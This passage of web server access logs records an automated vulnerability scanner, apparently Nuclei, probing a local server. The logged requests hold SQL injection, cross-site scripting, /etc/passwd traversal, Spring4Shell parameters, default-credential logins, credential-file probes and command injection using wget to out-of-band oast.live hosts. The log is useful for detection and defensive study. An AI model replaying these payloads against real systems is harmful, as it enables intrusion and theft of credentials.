+0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.esmtprc HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.337","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /themes HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.274","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /pods HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.044","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"command=delete%20cli%20alias%20private%20list","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.301","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.316","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///%5C/example.com/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.263","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.282","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.283","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.339","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.4.2.1...json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.343","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"username=Administrator&password=versa123&sso=systemRadio","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /versa/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.346","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"macAddress=112233445566%3Bwget+http%3A%2F%2Fc9oms3gsmpve1ijt0mc0s3z1nxfkpkff7.oast.live%23®info=0&writeData=Submit","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /boardDataWW.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.363","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v1/graphiql HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.350","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?class.module.classLoader.resources.context.configFile=https://c9oms3gsmpve1ijt0mc0fg4y18zut1rpc.oast.live&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.395","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?a=display&templateFile=README.md HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.285","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /remotereporter/load_logfiles.php?server=018192&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.310","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /_plugin/head/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.333","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.git-credentials HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.110","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/123contactform-for-wordpress/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.258","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /openam/XUI/Login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.364","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /module/api.php?mobile/webNasIPS HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.264","http_user_agent":"TNAS", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22option\x22\x0D\x0A\x0D\x0Acom_gmapfp\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22image1\x22; filename=\x22nuclei.html.gif\x22\x0D\x0AContent-Type: text/html\x0D\x0A\x0D\x0Aprojectdiscovery\x0D\x0A\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22no_html\x22\x0D\x0A\x0D\x0Ano_html\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS--\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.245","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /webadmin/clientlogin/?srid=&action=showdeny&url= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.635","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/config HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.270","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /awstats/awredir.pl?url=example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.347","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v1/graphiql.css HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.261","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.275","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.290","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cdn-cgi/image/width/https://c9oms3gsmpve1ijt0mc0461w4trgrnxz3.oast.live HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.359","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wps/PA_WCM_Authoring_UI/proxy/http/example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.360","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.css HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.658","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Orion/Login.aspx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.660","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"class.module.classLoader.resources.context.configFile=https://c9oms3gsmpve1ijt0mc0ai4gargf1et4e.oast.live&class.module.classLoader.resources.context.configFile.content.aaa=xxx\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.365","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"&uid=10; wget http://c9oms3gsmpve1ijt0mc0au41oqcssfwft.oast.live","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /system/sharedir.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.369","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /otobo/index.pl HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.588","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?v=d&p=%22;alert(document.domain);%22 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.350","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /settings.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.296","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.276","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /panel HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.644","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.232","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /WebInterface/login.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.262","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.380","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Login?!'>","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /OA_HTML/lcmServiceController.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.339","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:57 +0000","request_body":"{\x22sheet\x22:[\x22.es(*)\x22],\x22time\x22:{\x22from\x22:\x22now-1m\x22,\x22to\x22:\x22now\x22,\x22mode\x22:\x22quick\x22,\x22interval\x22:\x22auto\x22,\x22timezone\x22:\x22Asia/Shanghai\x22}}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /api/timelion/run HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.387","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:57 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/woocommerce/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.273","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:57 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /eam/vib?id=C:\x5CProgramData\x5CVMware\x5CVMware+VirtualCenter\x5Cvcdb.properties HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.283","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:57 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /openam/XUI/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.373","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:57 +0000","request_body":"{\x0D\x0A \x22application_type\x22: \x22web\x22,\x0D\x0A \x22redirect_uris\x22: [\x22https://c9oms3gsmpve1ijt0mc0huh371xbe5hwo.oast.live/callback\x22],\x0D\x0A \x22client_name\x22: \x22127.0.0.1\x22,\x0D\x0A \x22logo_uri\x22: \x22https://c9oms3gsmpve1ijt0mc0naqhn4djfhhdq.oast.live/favicon.ico\x22,\x0D\x0A \x22subject_type\x22: \x22pairwise\x22,\x0D\x0A \x22token_endpoint_auth_method\x22: \x22client_secret_basic\x22,\x0D\x0A \x22request_uris\x22: [\x22https://c9oms3gsmpve1ijt0mc0x5gsspsuygq83.oast.live\x22]\x0D\x0A}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /connect/register HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.341","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:57 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///%5Cexample.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.379","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:57 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /src/redirect.php?plugins[]=../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.264","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:57 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /actuator HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.301","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:57 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1) HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.380","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:57 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /owa/auth/logon.aspx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.401","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:57 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ads/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.351","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:57 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.359","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:57 